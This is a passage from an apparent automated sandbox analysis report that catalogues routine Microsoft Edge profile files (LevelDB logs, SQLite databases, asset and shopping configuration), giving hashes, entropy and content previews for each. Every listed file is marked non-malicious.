af0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8e05a766-8667-42b0-b842-df1895a8fadb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.2567460454153885
Encrypted:	false
SSDEEP:	6:HUYMs1923oH+Tcwtp3hBtB2KLlVUYt7L+q2P923oH+Tcwtp3hBWsIFUv:bMBYebp3dFLTcv4Yebp3eFUv
MD5:	F7623310042BA3B0B5EF145B0A82FF3F
SHA1:	99219A4E9D986D716EFE3A02ED4EFA14DF948480
SHA-256:	4D39AEBEB0483EA9EA909323845B7B696488D42DDB246AE3F281D06F0562AB5A
SHA-512:	27B10EF281D87EB054A41DC62EA04AB44236A6504A2577FA5C0CA674391DCF0034978C4D07D7E758DCB4C6D752B3676E9EEAAB71E07D86F221BF6BA82B88D60E
Malicious:	false
Preview:	2024/11/11-18:06:23.674 1f78 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/11-18:06:23.977 1f78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.22288364953732
Encrypted:	false
SSDEEP:	24576:v+/PN8F7fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN89fx2mjF
MD5:	C830826C1B9D092630831EFCCFA8A5B8
SHA1:	144A17EFDA8DD01DF54B9D0208893112FA1F9EED
SHA-256:	151CBD59B0BC8E5DA81188B15435096DF046806D6517135449F890EB52177698
SHA-512:	A841A01772955C9500000892C5680BB2474572B5D901329B4A8D23AAD0F6AC4645D070502D0DAA6284539A92078B412B7E281BF37AB3CAD9B0B9AA9742953C6F
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.096829850701423
Encrypted:	false
SSDEEP:	6:HUY0F+q2P923oH+Tcwt9Eh1tIFUt8YUY0fFZZmw+YUY4VkwO923oH+Tcwt9Eh15d:bjv4Yeb9Eh16FUt8uwFZ/+uw5LYeb9Er
MD5:	4BECD4065F50F138E6BFB0F3AA2A86A3
SHA1:	6FB90F9D0A0DE74AA70F4F6C0684956CC682A3BE
SHA-256:	FB53F48051727DAA41F2B24A1030EE0055F10A120CD17E048743B3896FC4E5D2
SHA-512:	91CC895E32126DCBC07AEE22E8C030CEC79E01E6F0F41DD9D7D8627A043B3ACC6B45934C5F08621D15B0EF947CE0726C22E39E5F07FADBB4C68A84A2922DCE53
Malicious:	false
Preview:	2024/11/11-18:06:23.626 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/11-18:06:23.628 2118 Recovering log #3.2024/11/11-18:06:23.637 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.096829850701423
Encrypted:	false
SSDEEP:	6:HUY0F+q2P923oH+Tcwt9Eh1tIFUt8YUY0fFZZmw+YUY4VkwO923oH+Tcwt9Eh15d:bjv4Yeb9Eh16FUt8uwFZ/+uw5LYeb9Er
MD5:	4BECD4065F50F138E6BFB0F3AA2A86A3
SHA1:	6FB90F9D0A0DE74AA70F4F6C0684956CC682A3BE
SHA-256:	FB53F48051727DAA41F2B24A1030EE0055F10A120CD17E048743B3896FC4E5D2
SHA-512:	91CC895E32126DCBC07AEE22E8C030CEC79E01E6F0F41DD9D7D8627A043B3ACC6B45934C5F08621D15B0EF947CE0726C22E39E5F07FADBB4C68A84A2922DCE53
Malicious:	false
Preview:	2024/11/11-18:06:23.626 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/11-18:06:23.628 2118 Recovering log #3.2024/11/11-18:06:23.637 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4618785330418697
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5jD:TouQq3qh7z3bY2LNW9WMcUvBu5
MD5:	1D76D83C8AC514C64A982B46E1351D6A
SHA1:	BD6C69ECFB734E3EDAFA971B1BEC04B1CD380C24
SHA-256:	2021599D87D394A7F31B32713DC648B4F0E5C86CC38F1E1E35439C33BEC8763A
SHA-512:	B196BAC9BAB761568A35538BFD918AD763A0365ACBECA5557F24081C86D496D3CF905DCDDCB8F3154A25700B4E5F96D5A7F740B88AE634473CBE481E58982B72
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.146386263110652
Encrypted:	false
SSDEEP:	6:HUYKBjyq2P923oH+TcwtnG2tMsIFUt8YUYr1Zmw+YUY9RkwO923oH+TcwtnG2tM2:bKcv4Yebn9GFUt8ur1/+u75LYebn95J
MD5:	029E917D129137E7719BDDFD5FCCF600
SHA1:	9126EE7FDE2027BFD2E0013CA012DB7858F2DF4A
SHA-256:	3F3FAF8EC246935D6B167664C81BBCBE4C09CF1D057C21AE2036C38E5CD90E2D
SHA-512:	09C7CA8ABD29F1733122AA92192C3E679ED1A914ED30EC4821D36A5E300A086C1E38F0550D74E6AB6CE376B6155F89D76E8A4D910B1A2844D23707F8D22B189B
Malicious:	false
Preview:	2024/11/11-18:06:17.177 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/11-18:06:17.178 1dc0 Recovering log #3.2024/11/11-18:06:17.178 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.146386263110652
Encrypted:	false
SSDEEP:	6:HUYKBjyq2P923oH+TcwtnG2tMsIFUt8YUYr1Zmw+YUY9RkwO923oH+TcwtnG2tM2:bKcv4Yebn9GFUt8ur1/+u75LYebn95J
MD5:	029E917D129137E7719BDDFD5FCCF600
SHA1:	9126EE7FDE2027BFD2E0013CA012DB7858F2DF4A
SHA-256:	3F3FAF8EC246935D6B167664C81BBCBE4C09CF1D057C21AE2036C38E5CD90E2D
SHA-512:	09C7CA8ABD29F1733122AA92192C3E679ED1A914ED30EC4821D36A5E300A086C1E38F0550D74E6AB6CE376B6155F89D76E8A4D910B1A2844D23707F8D22B189B
Malicious:	false
Preview:	2024/11/11-18:06:17.177 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/11-18:06:17.178 1dc0 Recovering log #3.2024/11/11-18:06:17.178 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.613074711916143
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWA+CMAqC+Ns:TLapR+DDNzWjJ0npnyXKUO8+jvpCXmL
MD5:	B5981C643E137EE4A37DC3F0CCA72908
SHA1:	759BE2888186FD2FEDAB4A9B6E0D6A08D6D71A36
SHA-256:	AEE7952691DE2D002F3306F698BECF21D74012C537B6266644EDF62FB57C5BBB
SHA-512:	085D79CA21CF7C903EE64C874434EF389306974CBE7414640706B523A05B367145318DBDEBA61F4CEA1B7D67AB6FE8DD1FE231D7CF837706F6406F079F3F8268
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354118139529634
Encrypted:	false
SSDEEP:	6144:eA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:eFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	6CFB0D18B574F2521430AE1BEB2F9272
SHA1:	507C7D86121B11526CDA5150E423A5AFA3F1F594
SHA-256:	BA41DC56BCC5303F729F26D9D88F41D361C4531622B615921B7BEE19AA850FB1
SHA-512:	0881A0E5CC7A4EEF660A926FE12DC99138343295E459678B22162138765758CE3C105FF12BF2A4C23E7CD55E7E6D44294134928663B9EE12D0E867C442FA5A10
Malicious:	false
Preview:	...m.................DB_VERSION.1...dq...............&QUERY_TIMESTAMP:domains_config_gz2...13375839986000642..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.191801597544481
Encrypted:	false
SSDEEP:	6:HUYdM1923oH+Tcwtk2WwnvB2KLlVUYjo34q2P923oH+Tcwtk2WwnvIFUv:bdhYebkxwnvFLTjq4v4YebkxwnQFUv
MD5:	BB1A08D0C057EBFCAA64EFE9DA5E4C8B
SHA1:	B7D8F8D84CA6BE2B00232EE1ABC68C4DF950E84E
SHA-256:	11EA7E7C4B10DDD3A11DF61AB9E639E5A6EC656C385296759DF9E8815D891057
SHA-512:	8D5C61DF901EFA701B1927BF9782874E896DC434BCECCD6E41D8BC592D9EE1D3C07F60037CF1CDF808FE9AA1CC7DFEE2DBB3E62946D562BD1361CEE907D4DB05
Malicious:	false
Preview:	2024/11/11-18:06:23.655 2134 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/11-18:06:23.709 2134 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324613231470805
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rk:C1gAg1zfvM
MD5:	600621C824C620997E7CC8A759F28E90
SHA1:	F75192AF9690B29E92C9BFC5136F0CB47EDEAAEC
SHA-256:	DDADE118DD4DC5049CA4C4D783C5DA2DEBAF3B4F66CA00A9559A415E2B3950AD
SHA-512:	B11570CBED3890E741931E13832ACE822ABB9BB1EA491463DD13E2C8AEEEE2D48A8E08E3BA650B4C1258B6AD499D23955557A1AB7C96C8E15814AEE5D244F3D8
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.0992515250187616
Encrypted:	false
SSDEEP:	6:HUYuq2P923oH+Tcwt8aPrqIFUt8YUY3Zmw+YUY4xkwO923oH+Tcwt8amLJ:buv4YebL3FUt8u3/+u4x5LYebQJ
MD5:	4A12CA8BA29CD17D67AA712AE6D9F47B
SHA1:	F9BF30C272821A61F91765F4B94F9FE4BA0AEAFB
SHA-256:	B75B0988DDF56A562198F387C2F718733351B1E51F29AE031BFEC52C0D6C5A26
SHA-512:	2F4A1939DE6664F15022334E1D3DBF171C6F20D8A16696B28E2BB7726D23B5BED7409E99D2B5D5CFC6E8202634D40B0EE445EB17D84C978138FF56B7A3F92BC0
Malicious:	false
Preview:	2024/11/11-18:06:17.116 1c40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/11-18:06:17.116 1c40 Recovering log #3.2024/11/11-18:06:17.117 1c40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.0992515250187616
Encrypted:	false
SSDEEP:	6:HUYuq2P923oH+Tcwt8aPrqIFUt8YUY3Zmw+YUY4xkwO923oH+Tcwt8amLJ:buv4YebL3FUt8u3/+u4x5LYebQJ
MD5:	4A12CA8BA29CD17D67AA712AE6D9F47B
SHA1:	F9BF30C272821A61F91765F4B94F9FE4BA0AEAFB
SHA-256:	B75B0988DDF56A562198F387C2F718733351B1E51F29AE031BFEC52C0D6C5A26
SHA-512:	2F4A1939DE6664F15022334E1D3DBF171C6F20D8A16696B28E2BB7726D23B5BED7409E99D2B5D5CFC6E8202634D40B0EE445EB17D84C978138FF56B7A3F92BC0
Malicious:	false
Preview:	2024/11/11-18:06:17.116 1c40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/11-18:06:17.116 1c40 Recovering log #3.2024/11/11-18:06:17.117 1c40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.140237159108681
Encrypted:	false
